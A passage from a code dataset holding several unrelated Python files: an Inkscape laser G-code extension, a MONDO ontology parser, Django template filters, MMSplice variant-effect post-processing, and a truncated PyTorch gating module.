\"G00\": g += \"G1 \" + feed + \"\\n\"\n g += \"G1 \" + c(si[0]) + \"\\n\"\n lg = 'G01'\n elif s[1] == 'arc':\n r = [(s[2][0] - s[0][0]), (s[2][1] - s[0][1])]\n if lg == \"G00\": g += \"G1 \" + feed + \"\\n\"\n if (r[0] ** 2 + r[1] ** 2) > .1:\n r1, r2 = (P(s[0]) - P(s[2])), (P(si[0]) - P(s[2]))\n if abs(r1.mag() - r2.mag()) < 0.001:\n g += (\"G2\" if s[3] < 0 else \"G3\") + c(\n si[0] + [None, (s[2][0] - s[0][0]), (s[2][1] - s[0][1])]) + \"\\n\"\n else:\n r = (r1.mag() + r2.mag()) / 2\n g += (\"G2\" if s[3] < 0 else \"G3\") + c(si[0]) + \" R%f\" % (r) + \"\\n\"\n lg = 'G02'\n else:\n g += \"G1 \" + c(si[0]) + \" \" + feed + \"\\n\"\n lg = 'G01'\n if si[1] == 'end':\n g += tool['gcode after path'] + \"\\n\"\n return g\n\n\n def get_transforms(self, g):\n root = self.document.getroot()\n trans = []\n while (g != root):\n if 'transform' in list(g.keys()):\n t = g.get('transform')\n t = simpletransform.parseTransform(t)\n trans = simpletransform.composeTransform(t, trans) if trans != [] else t\n print_(trans)\n g = g.getparent()\n return trans\n\n\n def apply_transforms(self, g, csp):\n trans = self.get_transforms(g)\n if trans != []:\n simpletransform.applyTransformToPath(trans, csp)\n return csp\n\n\n def transform(self, source_point, layer, reverse=False):\n if layer == None:\n layer = self.current_layer if self.current_layer is not None else self.document.getroot()\n if layer not in self.transform_matrix:\n for i in range(self.layers.index(layer), -1, -1):\n if self.layers[i] in self.orientation_points:\n break\n\n print_(str(self.layers))\n print_(str(\"I: \" + str(i)))\n print_(\"Transform: \" + str(self.layers[i]))\n if self.layers[i] not in self.orientation_points:\n self.error(_(\n \"Orientation points for '%s' layer have not been found! Please add orientation points using Orientation tab!\") % layer.get(\n inkex.addNS('label', 'inkscape')), \"no_orientation_points\")\n elif self.layers[i] in self.transform_matrix:\n self.transform_matrix[layer] = self.transform_matrix[self.layers[i]]\n else:\n orientation_layer = self.layers[i]\n if len(self.orientation_points[orientation_layer]) > 1:\n self.error(\n _(\"There are more than one orientation point groups in '%s' layer\") % orientation_layer.get(\n inkex.addNS('label', 'inkscape')), \"more_than_one_orientation_point_groups\")\n points = self.orientation_points[orientation_layer][0]\n if len(points) == 2:\n points += [[[(points[1][0][1] - points[0][0][1]) + points[0][0][0],\n -(points[1][0][0] - points[0][0][0]) + points[0][0][1]],\n [-(points[1][1][1] - points[0][1][1]) + points[0][1][0],\n points[1][1][0] - points[0][1][0] + points[0][1][1]]]]\n if len(points) == 3:\n print_(\"Layer '%s' Orientation points: \" % orientation_layer.get(inkex.addNS('label', 'inkscape')))\n for point in points:\n print_(point)\n # Zcoordinates definition taken from Orientatnion point 1 and 2\n self.Zcoordinates[layer] = [max(points[0][1][2], points[1][1][2]),\n min(points[0][1][2], points[1][1][2])]\n matrix = numpy.array([\n [points[0][0][0], points[0][0][1], 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, points[0][0][0], points[0][0][1], 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, points[0][0][0], points[0][0][1], 1],\n [points[1][0][0], points[1][0][1], 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, points[1][0][0], points[1][0][1], 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, points[1][0][0], points[1][0][1], 1],\n [points[2][0][0], points[2][0][1], 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, points[2][0][0], points[2][0][1], 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, points[2][0][0], points[2][0][1], 1]\n ])\n\n if numpy.linalg.det(matrix) != 0:\n m = numpy.linalg.solve(matrix,\n numpy.array(\n [[points[0][1][0]], [points[0][1][1]], [1], [points[1][1][0]],\n [points[1][1][1]], [1], [points[2][1][0]], [points[2][1][1]], [1]]\n )\n ).tolist()\n self.transform_matrix[layer] = [[m[j * 3 + i][0] for i in range(3)] for j in range(3)]\n\n else:\n self.error(_(\n \"Orientation points are wrong! (if there are two orientation points they sould not be the same. If there are three orientation points they should not be in a straight line.)\"),\n \"wrong_orientation_points\")\n else:\n self.error(_(\n \"Orientation points are wrong! (if there are two orientation points they sould not be the same. If there are three orientation points they should not be in a straight line.)\"),\n \"wrong_orientation_points\")\n\n self.transform_matrix_reverse[layer] = numpy.linalg.inv(self.transform_matrix[layer]).tolist()\n print_(\"\\n Layer '%s' transformation matrixes:\" % layer.get(inkex.addNS('label', 'inkscape')))\n print_(self.transform_matrix)\n print_(self.transform_matrix_reverse)\n\n # Zautoscale is absolute\n self.Zauto_scale[layer] = 1\n print_(\"Z automatic scale = %s (computed according orientation points)\" % self.Zauto_scale[layer])\n\n x, y = source_point[0], source_point[1]\n if not reverse:\n t = self.transform_matrix[layer]\n else:\n t = self.transform_matrix_reverse[layer]\n return [t[0][0] * x + t[0][1] * y + t[0][2], t[1][0] * x + t[1][1] * y + t[1][2]]\n\n\n def transform_csp(self, csp_, layer, reverse=False):\n csp = [[[csp_[i][j][0][:], csp_[i][j][1][:], csp_[i][j][2][:]] for j in range(len(csp_[i]))] for i in\n range(len(csp_))]\n for i in range(len(csp)):\n for j in range(len(csp[i])):\n for k in range(len(csp[i][j])):\n csp[i][j][k] = self.transform(csp[i][j][k], layer, reverse)\n return csp\n\n ################################################################################\n # Errors handling function, notes are just printed into Logfile,\n # warnings are printed into log file and warning message is displayed but\n # extension continues working, errors causes log and execution is halted\n # Notes, warnings adn errors could be assigned to space or comma or dot\n # sepparated strings (case is ignoreg).\n ################################################################################\n def error(self, s, type_=\"Warning\"):\n notes = \"Note \"\n warnings = \"\"\"\n Warning tools_warning\n bad_orientation_points_in_some_layers\n more_than_one_orientation_point_groups\n more_than_one_tool\n orientation_have_not_been_defined\n tool_have_not_been_defined\n selection_does_not_contain_paths\n selection_does_not_contain_paths_will_take_all\n selection_is_empty_will_comupe_drawing\n selection_contains_objects_that_are_not_paths\n \"\"\"\n errors = \"\"\"\n Error\n wrong_orientation_points\n area_tools_diameter_error\n no_tool_error\n active_layer_already_has_tool\n active_layer_already_has_orientation_points\n \"\"\"\n if type_.lower() in re.split(\"[\\s\\n,\\.]+\", errors.lower()):\n print_(s)\n inkex.errormsg(s + \"\\n\")\n sys.exit()\n elif type_.lower() in re.split(\"[\\s\\n,\\.]+\", warnings.lower()):\n print_(s)\n if not self.options.suppress_all_messages:\n inkex.errormsg(s + \"\\n\")\n elif type_.lower() in re.split(\"[\\s\\n,\\.]+\", notes.lower()):\n print_(s)\n else:\n print_(s)\n inkex.errormsg(s)\n sys.exit()\n\n ################################################################################\n # Get defs from svg\n ################################################################################\n def get_defs(self):\n self.defs = {}\n\n def recursive(g):\n for i in g:\n if i.tag == inkex.addNS(\"defs\", \"svg\"):\n for j in i:\n self.defs[j.get(\"id\")] = i\n if i.tag == inkex.addNS(\"g\", 'svg'):\n recursive(i)\n\n recursive(self.document.getroot())\n\n\n ################################################################################\n #\n # Get Gcodetools info from the svg\n #\n ################################################################################\n def get_info(self):\n self.selected_paths = {}\n self.paths = {}\n self.orientation_points = {}\n self.layers = [self.document.getroot()]\n self.Zcoordinates = {}\n self.transform_matrix = {}\n self.transform_matrix_reverse = {}\n self.Zauto_scale = {}\n\n def recursive_search(g, layer, selected=False):\n items = g.getchildren()\n items.reverse()\n for i in items:\n if selected:\n self.selected_hack[i.get(\"id\")] = i\n if i.tag == inkex.addNS(\"g\", 'svg') and i.get(inkex.addNS('groupmode', 'inkscape')) == 'layer':\n self.layers += [i]\n recursive_search(i, i)\n elif i.get('gcodetools') == \"Gcodetools orientation group\":\n points = self.get_orientation_points(i)\n if points != None:\n self.orientation_points[layer] = self.orientation_points[layer] + [\n points[:]] if layer in self.orientation_points else [points[:]]\n print_(\"Found orientation points in '%s' layer: %s\" % (\n layer.get(inkex.addNS('label', 'inkscape')), points))\n else:\n self.error(_(\n \"Warning! Found bad orientation points in '%s' layer. Resulting Gcode could be corrupt!\") % layer.get(\n inkex.addNS('label', 'inkscape')), \"bad_orientation_points_in_some_layers\")\n elif i.tag == inkex.addNS('path', 'svg'):\n if \"gcodetools\" not in list(i.keys()):\n self.paths[layer] = self.paths[layer] + [i] if layer in self.paths else [i]\n if i.get(\"id\") in self.selected_hack:\n self.selected_paths[layer] = self.selected_paths[layer] + [\n i] if layer in self.selected_paths else [i]\n elif i.tag == inkex.addNS(\"g\", 'svg'):\n recursive_search(i, layer, (i.get(\"id\") in self.selected_hack))\n elif i.get(\"id\") in self.selected_hack:\n self.error(_(\n \"This extension works with Paths and Dynamic Offsets and groups of them only! All other objects will be ignored!\\nSolution 1: press Path->Object to path or Shift+Ctrl+C.\\nSolution 2: Path->Dynamic offset or Ctrl+J.\\nSolution 3: export all contours to PostScript level 2 (File->Save As->.ps) and File->Import this file.\"),\n \"selection_contains_objects_that_are_not_paths\")\n\n\n recursive_search(self.document.getroot(), self.document.getroot())\n\n def get_orientation_points(self, g):\n items = g.getchildren()\n items.reverse()\n p2, p3 = [], []\n p = None\n for i in items:\n if i.tag == inkex.addNS(\"g\", 'svg') and i.get(\"gcodetools\") == \"Gcodetools orientation point (2 points)\":\n p2 += [i]\n if i.tag == inkex.addNS(\"g\", 'svg') and i.get(\"gcodetools\") == \"Gcodetools orientation point (3 points)\":\n p3 += [i]\n if len(p2) == 2:\n p = p2\n elif len(p3) == 3:\n p = p3\n if p == None: return None\n points = []\n for i in p:\n point = [[], []]\n for node in i:\n if node.get('gcodetools') == \"Gcodetools orientation point arrow\":\n point[0] = self.apply_transforms(node, parsePath(node.get(\"d\")))[0][0][1]\n if node.get('gcodetools') == \"Gcodetools orientation point text\":\n r = re.match(\n r'(?i)\\s*\\(\\s*(-?\\s*\\d*(?:,|\\.)*\\d*)\\s*;\\s*(-?\\s*\\d*(?:,|\\.)*\\d*)\\s*;\\s*(-?\\s*\\d*(?:,|\\.)*\\d*)\\s*\\)\\s*',\n node.text)\n point[1] = [float(r.group(1)), float(r.group(2)), float(r.group(3))]\n if point[0] != [] and point[1] != []: points += [point]\n if len(points) == len(p2) == 2 or len(points) == len(p3) == 3:\n return points\n else:\n return None\n\n ################################################################################\n #\n # dxfpoints\n #\n ################################################################################\n def dxfpoints(self):\n if self.selected_paths == {}:\n self.error(_(\n \"Noting is selected. Please select something to convert to drill point (dxfpoint) or clear point sign.\"),\n \"warning\")\n for layer in self.layers:\n if layer in self.selected_paths:\n for path in self.selected_paths[layer]:\n if self.options.dxfpoints_action == 'replace':\n path.set(\"dxfpoint\", \"1\")\n r = re.match(\"^\\s*.\\s*(\\S+)\", path.get(\"d\"))\n if r != None:\n print_((\"got path=\", r.group(1)))\n path.set(\"d\",\n \"m %s 2.9375,-6.343750000001 0.8125,1.90625 6.843748640396,-6.84374864039 0,0 0.6875,0.6875 -6.84375,6.84375 1.90625,0.812500000001 z\" % r.group(\n 1))\n path.set(\"style\", styles[\"dxf_points\"])\n\n if self.options.dxfpoints_action == 'save':\n path.set(\"dxfpoint\", \"1\")\n\n if self.options.dxfpoints_action == 'clear' and path.get(\"dxfpoint\") == \"1\":\n path.set(\"dxfpoint\", \"0\")\n\n ################################################################################\n #\n # Laser\n #\n ################################################################################\n def laser(self):\n\n def get_boundaries(points):\n minx, miny, maxx, maxy = None, None, None, None\n out = [[], [], [], []]\n for p in points:\n if minx == p[0]:\n out[0] += [p]\n if minx == None or p[0] < minx:\n minx = p[0]\n out[0] = [p]\n\n if miny == p[1]:\n out[1] += [p]\n if miny == None or p[1] < miny:\n miny = p[1]\n out[1] = [p]\n\n if maxx == p[0]:\n out[2] += [p]\n if maxx == None or p[0] > maxx:\n maxx = p[0]\n out[2] = [p]\n\n if maxy == p[1]:\n out[3] += [p]\n if maxy == None or p[1] > maxy:\n maxy = p[1]\n out[3] = [p]\n return out\n\n\n def remove_duplicates(points):\n i = 0\n out = []\n for p in points:\n for j in range(i, len(points)):\n if p == points[j]: points[j] = [None, None]\n if p != [None, None]: out += [p]\n i += 1\n return (out)\n\n\n def get_way_len(points):\n l = 0\n for i in range(1, len(points)):\n l += math.sqrt((points[i][0] - points[i - 1][0]) ** 2 + (points[i][1] - points[i - 1][1]) ** 2)\n return l\n\n def sort_dxfpoints(points):\n points = remove_duplicates(points)\n\n ways = [\n # l=0, d=1, r=2, u=3\n [3, 0], # ul\n [3, 2], # ur\n [1, 0], # dl\n [1, 2], # dr\n [0, 3], # lu\n [0, 1], # ld\n [2, 3], # ru\n [2, 1], # rd\n ]\n\n minimal_way = []\n minimal_len = None\n minimal_way_type = None\n for w in ways:\n tpoints = points[:]\n cw = []\n for j in range(0, len(points)):\n p = get_boundaries(get_boundaries(tpoints)[w[0]])[w[1]]\n tpoints.remove(p[0])\n cw += p\n curlen = get_way_len(cw)\n if minimal_len == None or curlen < minimal_len:\n minimal_len = curlen\n minimal_way = cw\n minimal_way_type = w\n\n return minimal_way\n\n if self.selected_paths == {}:\n paths = self.paths\n self.error(_(\"No paths are selected! Trying to work on all available paths.\"), \"warning\")\n else:\n paths = self.selected_paths\n\n self.check_dir()\n gcode = \"\"\n\n biarc_group = etree.SubElement(\n list(self.selected_paths.keys())[0] if len(list(self.selected_paths.keys())) > 0 else self.layers[0],\n inkex.addNS('g', 'svg'))\n print_((\"self.layers=\", self.layers))\n print_((\"paths=\", paths))\n for layer in self.layers:\n if layer in paths:\n print_((\"layer\", layer))\n p = []\n dxfpoints = []\n for path in paths[layer]:\n print_(str(layer))\n if \"d\" not in list(path.keys()):\n self.error(_(\n \"Warning: One or more paths dont have 'd' parameter, try to Ungroup (Ctrl+Shift+G) and Object to Path (Ctrl+Shift+C)!\"),\n \"selection_contains_objects_that_are_not_paths\")\n continue\n csp = parsePath(path.get(\"d\"))\n csp = self.apply_transforms(path, csp)\n if path.get(\"dxfpoint\") == \"1\":\n tmp_curve = self.transform_csp(csp, layer)\n x = tmp_curve[0][0][0][0]\n y = tmp_curve[0][0][0][1]\n print_(\"got dxfpoint (scaled) at (%f,%f)\" % (x, y))\n dxfpoints += [[x, y]]\n else:\n p += csp\n dxfpoints = sort_dxfpoints(dxfpoints)\n curve = self.parse_curve(p, layer)\n self.draw_curve(curve, layer, biarc_group)\n gcode += self.generate_gcode(curve, layer, 0)\n\n self.export_gcode(gcode)\n\n ################################################################################\n #\n # Orientation\n #\n ################################################################################\n def orientation(self, layer=None):\n print_(\"entering orientations\")\n if layer == None:\n layer = self.current_layer if self.current_layer is not None else self.document.getroot()\n if layer in self.orientation_points:\n self.error(_(\"Active layer already has orientation points! Remove them or select another layer!\"),\n \"active_layer_already_has_orientation_points\")\n\n orientation_group = etree.SubElement(layer, inkex.addNS('g', 'svg'),\n {\"gcodetools\": \"Gcodetools orientation group\"})\n\n # translate == ['0', '-917.7043']\n if layer.get(\"transform\") != None:\n translate = layer.get(\"transform\").replace(\"translate(\", \"\").replace(\")\", \"\").split(\",\")\n else:\n translate = [0, 0]\n\n # doc height in pixels (38 mm == 143.62204724px)\n doc_height = self.svg.unittouu(self.document.getroot().xpath('@height', namespaces=inkex.NSS)[0])\n\n if self.document.getroot().get('height') == \"100%\":\n doc_height = 1052.3622047\n print_(\"Overriding height from 100 percents to %s\" % doc_height)\n\n print_(\"Document height: \" + str(doc_height));\n\n if self.options.unit == \"G21 (All units in mm)\":\n points = [[0., 0., 0.], [100., 0., 0.], [0., 100., 0.]]\n orientation_scale = 1\n print_(\"orientation_scale < 0 ===> switching to mm units=%0.10f\" % orientation_scale)\n elif self.options.unit == \"G20 (All units in inches)\":\n points = [[0., 0., 0.], [5., 0., 0.], [0., 5., 0.]]\n orientation_scale = 90\n print_(\"orientation_scale < 0 ===> switching to inches units=%0.10f\" % orientation_scale)\n\n points = points[:2]\n\n print_((\"using orientation scale\", orientation_scale, \"i=\", points))\n for i in points:\n # X == Correct!\n # si == x,y coordinate in px\n # si have correct coordinates\n # if layer have any transform it will be in translate so lets add that\n si = [i[0] * orientation_scale, (i[1] * orientation_scale) + float(translate[1])]\n g = etree.SubElement(orientation_group, inkex.addNS('g', 'svg'),\n {'gcodetools': \"Gcodetools orientation point (2 points)\"})\n etree.SubElement(g, inkex.addNS('path', 'svg'),\n {\n 'style': \"stroke:none;fill:#000000;\",\n 'd': 'm %s,%s 2.9375,-6.343750000001 0.8125,1.90625 6.843748640396,-6.84374864039 0,0 0.6875,0.6875 -6.84375,6.84375 1.90625,0.812500000001 z z' % (\n si[0], -si[1] + doc_height),\n 'gcodetools': \"Gcodetools orientation point arrow\"\n })\n t = etree.SubElement(g, inkex.addNS('text', 'svg'),\n {\n 'style': \"font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#000000;fill-opacity:1;stroke:none;\",\n inkex.addNS(\"space\", \"xml\"): \"preserve\",\n 'x': str(si[0] + 10),\n 'y': str(-si[1] - 10 + doc_height),\n 'gcodetools': \"Gcodetools orientation point text\"\n })\n t.text = \"(%s; %s; %s)\" % (i[0], i[1], i[2])\n\n\n ################################################################################\n #\n # Effect\n #\n # Main function of Gcodetools class\n #\n ################################################################################\n def effect(self):\n global options\n options = self.options\n options.self = self\n options.doc_root = self.document.getroot()\n # define print_ function\n global print_\n if self.options.log_create_log:\n try:\n if os.path.isfile(self.options.log_filename): os.remove(self.options.log_filename)\n f = open(self.options.log_filename, \"a\")\n f.write(\"Gcodetools log file.\\nStarted at %s.\\n%s\\n\" % (\n time.strftime(\"%d.%m.%Y %H:%M:%S\"), options.log_filename))\n f.write(\"%s tab is active.\\n\" % self.options.active_tab)\n f.close()\n except:\n print_ = lambda *x: None\n else:\n print_ = lambda *x: None\n self.get_info()\n if self.orientation_points == {}:\n self.error(_(\n \"Orientation points have not been defined! A default set of orientation points has been automatically added.\"),\n \"warning\")\n self.orientation(self.layers[min(0, len(self.layers) - 1)])\n self.get_info()\n\n self.tools = {\n \"name\": \"Laser Engraver\",\n \"id\": \"Laser Engraver\",\n \"penetration feed\": self.options.laser_speed,\n \"feed\": self.options.laser_speed,\n \"gcode before path\": (\"G4 P0 \\n\" + self.options.laser_command + \" S\" + str(\n int(self.options.laser_power)) + \"\\nG4 P\" + self.options.power_delay),\n \"gcode after path\": (\n \"G4 P0 \\n\" + self.options.laser_off_command + \" S0\" + \"\\n\" + \"G1 F\" + self.options.travel_speed),\n }\n\n self.get_info()\n self.laser()\n\n\ne = LaserGcode()\nif target_version < 1.0:\n e.affect()\nelse:\n e.run()\n","sub_path":"Drawbotextension/JTechPhotonic LaserTools/testlaser.py","file_name":"testlaser.py","file_ext":"py","file_size_in_byte":63526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"475286047","text":"import logging\nimport re\nimport json\nimport jsonlines\nfrom definitions import PIS_OUTPUT_EFO, PIS_OUTPUT_ANNOTATIONS\n\nlogger = logging.getLogger(__name__)\n\n\nclass MONDO(object):\n\n def __init__(self, mondo_input):\n self.mondo_input = mondo_input\n self.mondo = {}\n\n def init_mondo(self, id):\n self.mondo[id] = {}\n self.mondo[id]['id'] = id\n self.mondo[id]['resource'] = 'MONDO'\n\n def extract_id(self, elem):\n return elem.replace(\":\", \"_\")\n\n def get_id(self, mondo):\n if 'id' in mondo:\n return mondo['id'].replace(\":\", \"_\")\n if '@id' in mondo:\n return re.sub(r'^.*?:', '', mondo['@id'] )\n else:\n print (\"orrore\")\n\n def set_dbXRefs(self, id, mondo):\n dbXRefs = []\n if 'hasDbXref' in mondo:\n if isinstance(mondo['hasDbXref'], str):\n dbXRefs.append(mondo['hasDbXref'])\n else:\n for ref in mondo['hasDbXref']:\n dbXRefs.append(ref)\n\n self.mondo[id]['dbXRefs']= dbXRefs\n\n def set_obsoleted_term(self, id, mondo):\n if \"hasAlternativeId\" in mondo:\n obsolete = []\n if isinstance(mondo['hasAlternativeId'], str):\n obsolete.append(self.extract_id(mondo['hasAlternativeId']))\n else:\n for term in mondo['hasAlternativeId']:\n obsolete.append(self.extract_id(term))\n\n self.mondo[id]['obsolete_terms'] = obsolete\n\n\n def set_label(self, id, mondo):\n if 'label' in mondo:\n if isinstance(mondo['label'], str):\n self.mondo[id]['name'] = mondo['label']\n elif isinstance(mondo['label'], dict):\n self.mondo[id]['name'] = mondo['label']['@value']\n else:\n if isinstance(mondo['label'][0], str):\n self.mondo[id]['name'] = mondo['label'][0]\n else:\n self.mondo[id]['name'] = mondo['label'][0]['@value']\n\n def is_valid(self,mondo):\n if 'owl:deprecated' in mondo:\n return False\n else:\n return True\n\n def get_subClassOf(self,id, mondo):\n if \"subClassOf\" in mondo:\n classesOf = []\n if isinstance(mondo['subClassOf'], str):\n classesOf.append(re.sub(r'^.*?:', '', mondo['subClassOf'] ).replace(\":\", \"_\"))\n else:\n for term in mondo['subClassOf']:\n classesOf.append(re.sub(r'^.*?:', '', term).replace(\":\", \"_\"))\n\n self.mondo[id]['subClassOf'] = classesOf\n\n def set_mapping(self, id, mondo):\n if 'someValuesFrom' in mondo:\n self.mondo[id]['mapping'] = re.sub(r'^.*?:', '', mondo['someValuesFrom'] ).replace(\":\", \"_\")\n\n def set_phenotype(self):\n for mondo_id in self.mondo:\n phenotypes = []\n if 'subClassOf' in self.mondo[mondo_id]:\n for elem in self.mondo[mondo_id]['subClassOf']:\n if elem in self.mondo:\n if 'mapping' in self.mondo[elem]:\n phenotypes.append(self.mondo[elem]['mapping'])\n else:\n phenotypes.append(elem)\n self.mondo[mondo_id]['phenotypes'] = phenotypes\n\n\n def generate(self):\n with open(self.mondo_input) as input:\n for line in input:\n mondo = json.loads(line)\n id = self.get_id(mondo)\n if self.is_valid(mondo):\n self.init_mondo(id)\n self.set_label(id, mondo)\n self.set_dbXRefs(id, mondo)\n self.set_obsoleted_term(id, mondo)\n self.get_subClassOf(id, mondo)\n self.set_mapping(id,mondo)\n\n self.set_phenotype()\n\n\n def save_mondo(self, output_filename):\n mondo_filename = PIS_OUTPUT_ANNOTATIONS+'/'+output_filename\n with jsonlines.open(mondo_filename, mode='w') as writer:\n for elem in self.mondo:\n writer.write(self.mondo[elem])\n return mondo_filename","sub_path":"modules/helpers/MONDO.py","file_name":"MONDO.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"582003359","text":"import os\n\nfrom django import template\nfrom django.conf import settings\nfrom django.db.models.fields.files import FieldFile\nfrom django.utils.formats import number_format\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import gettext as _\n\nregister = template.Library()\n\n\n@register.filter()\ndef get_field_name(object, field):\n \"\"\" Get the verbose name of the asked field of the object. \"\"\"\n verbose_name = object._meta.get_field(field).verbose_name\n return verbose_name\n\n\n@register.filter()\n# From https://stackoverflow.com/a/7571539/8296763\ndef human_readable(value, arg):\n \"\"\" Output the human readable value of a field.\n\n Especially useful for choice-fields that would otherwise\n show the key instead of the value.\n \"\"\"\n if hasattr(value, 'get_' + str(arg) + '_display'):\n returnvalue = getattr(value, 'get_%s_display' % arg)()\n elif hasattr(value, str(arg)):\n if callable(getattr(value, str(arg))):\n returnvalue = getattr(value, arg)()\n else:\n returnvalue = getattr(value, arg)\n else:\n try:\n returnvalue = value[arg]\n except KeyError:\n return _('Invalid key %(key)s for value %(value)s') % {'key': arg, 'value': value}\n # Make sure boolean values get a human readable output as well and files get a link to open them\n if isinstance(returnvalue, bool):\n return _('Yes') if returnvalue is True else _('No')\n if type(returnvalue) is FieldFile and returnvalue:\n return mark_safe('' + os.path.basename(returnvalue.name) + '')\n if returnvalue is None:\n return '-'\n else:\n return returnvalue\n\n\n@register.filter()\ndef moneyformat(value):\n \"\"\" Properly format a numeric value as a monetary value. \"\"\"\n if value is None or value == '':\n return settings.MONETARY_CURRENCY + '-'\n sign = '-' if value < 0 else ''\n return sign + settings.MONETARY_CURRENCY + number_format(abs(value), decimal_pos=settings.MONETARY_DECIMAL_PLACES)\n","sub_path":"apps/core/templatetags/coretags.py","file_name":"coretags.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627595200","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom pkg_resources import resource_filename\nLINEAR_MODEL = joblib.load(resource_filename(\n 'mmsplice', 'models/linear_model.pkl'))\nLOGISTIC_MODEL = joblib.load(resource_filename(\n 'mmsplice', 'models/Pathogenicity.pkl'))\n\n\ndef max_varEff(df):\n \"\"\" Summarize largest absolute effect per variant across all affected exons.\n Args:\n df: result of `predict_all_table`\n \"\"\"\n if isinstance(df, str):\n df = pd.read_csv(df, index_col=0)\n\n ref_list = ['mmsplice_ref_acceptorIntron',\n 'mmsplice_ref_acceptor',\n 'mmsplice_ref_exon',\n 'mmsplice_ref_donor',\n 'mmsplice_ref_donorIntron']\n alt_list = ['mmsplice_alt_acceptorIntron',\n 'mmsplice_alt_acceptor',\n 'mmsplice_alt_exon',\n 'mmsplice_alt_donor',\n 'mmsplice_alt_donorIntron']\n\n if 'mmsplice_dlogitPsi' not in df.columns:\n X = df[alt_list].values - df[ref_list].values\n X = transform(X)\n df['mmsplice_dlogitPsi'] = LINEAR_MODEL.predict(X)\n\n dfMax = df.groupby(['ID'], as_index=False).agg(\n {'mmsplice_dlogitPsi': lambda x: max(x, key=abs)})\n\n dfMax = dfMax.merge(df, how='left', on=['ID', 'mmsplice_dlogitPsi'])\n dfMax = dfMax.drop_duplicates(subset=['ID', 'mmsplice_dlogitPsi'])\n # dfMax = dfMax.drop(\"mmsplice_dlogitPsi\", axis=1)\n return dfMax\n\n\ndef _not_close0(arr):\n return ~np.isclose(arr, 0)\n\n\ndef _and_not_close0(x, y):\n return np.logical_and(_not_close0(x), _not_close0(y))\n\n\ndef transform(X, region_only=False):\n ''' Make interaction terms for the overlapping prediction region\n Args:\n X: modular prediction. Shape (, 5)\n region_only: only interaction terms with indicator function on overlapping\n '''\n exon_overlap = np.logical_or(\n _and_not_close0(X[:, 1], X[:, 2]),\n _and_not_close0(X[:, 2], X[:, 3])\n )\n acceptor_intron_overlap = _and_not_close0(X[:, 0], X[:, 1])\n donor_intron_overlap = _and_not_close0(X[:, 3], X[:, 4])\n\n if not region_only:\n exon_overlap = X[:, 2] * exon_overlap\n donor_intron_overlap = X[:, 4] * donor_intron_overlap\n acceptor_intron_overlap = X[:, 0] * acceptor_intron_overlap\n\n return np.hstack([\n X,\n exon_overlap.reshape(-1, 1),\n donor_intron_overlap.reshape(-1, 1),\n acceptor_intron_overlap.reshape(-1, 1)\n ])\n\n\ndef predict_deltaLogitPsi(X_ref, X_alt):\n return LINEAR_MODEL.predict(transform(X_alt - X_ref, region_only=False))\n\n\ndef predict_pathogenicity(X_ref, X_alt):\n X = transform(X_alt - X_ref, region_only=True)\n X = np.concatenate([X_ref, X_alt, X[:, -3:]], axis=-1)\n return LOGISTIC_MODEL.predict_proba(X)[:, 1]\n\n\ndef read_vep(vep_result_path,\n max_per_var=False):\n ''' Read MMSplice VEP plugin output. Only support vcf type output.\n\n Args:\n vep_result_path: file path to the returned result of VEP plugin.\n max_per_var: return maximum absolute effect size per variant.\n '''\n\n from cyvcf2 import VCF\n from collections import defaultdict\n\n score_pred = []\n\n keys = [\n 'mmsplice_alt_acceptor',\n 'mmsplice_alt_acceptorIntron',\n 'mmsplice_alt_donor',\n 'mmsplice_alt_donorIntron',\n 'mmsplice_alt_exon',\n 'mmsplice_delta_logit_psi',\n 'mmsplice_pathogenicity',\n 'mmsplice_ref_acceptor',\n 'mmsplice_ref_acceptorIntron',\n 'mmsplice_ref_donor',\n 'mmsplice_ref_donorIntron',\n 'mmsplice_ref_exon'\n ]\n\n alt_seqs = defaultdict(list)\n ref_seqs = defaultdict(list)\n\n for l in VCF(vep_result_path):\n csq = l.INFO['CSQ'].split(',')\n predictions = map(lambda x: tuple(x.split('|')[-len(keys):]), csq)\n\n for pred in predictions:\n if pred != ('',) * len(keys):\n x = dict(\n zip(keys, map(float, (i if i != '' else 0 for i in pred))))\n x['ID'] = \"%s:%d:%s:%s\" % (\n l.CHROM, int(l.start) + 1, l.REF, l.ALT)\n score_pred.append(x)\n\n df_plugin = pd.DataFrame(score_pred)\n\n if max_per_var:\n df_plugin = max_varEff(df_plugin).set_index('ID')\n\n return df_plugin\n","sub_path":"mmsplice/utils/postproc.py","file_name":"postproc.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31288296","text":"import torch\nimport torch.nn as nn\n\nfrom .. import builder\nfrom ..registry import TEMPORAL\nfrom mmcv.cnn import xavier_init\n\n\n@TEMPORAL.register_module\nclass GatingSeq(nn.Module):\n\n def __init__(self,\n in_channels=(512, 1024, 512, 256, 256, 256),\n gating_seq_len=4):\n super(GatingSeq, self).__init__()\n self.in_channels = in_channels\n self.gating_seq_len = gating_seq_len\n conv_gating = []\n sigmoid = []\n conv = []\n relu = []\n\n for i in range(len(self.in_channels)):\n conv_gating.append(nn.Conv2d(self.in_channels[i]*self.seq_len, self.seq_len, \\\n kernel_size=3, padding=1))\n sigmoid.append(nn.Sigmoid())\n conv.append(nn.Conv2d(self.in_channels[i]*self.seq_len, self.in_channels[i],\\\n kernel_size=3, padding=1))\n relu.append(nn.ReLU(inplace=True))\n \n self.conv_gating = nn.ModuleList(conv_gating)\n self.sigmoid = nn.ModuleList(sigmoid)\n self.conv = nn.ModuleList(conv)\n self.relu = nn.ModuleList(relu)\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m, distribution='uniform', bias=0)\n\n def forward(self, 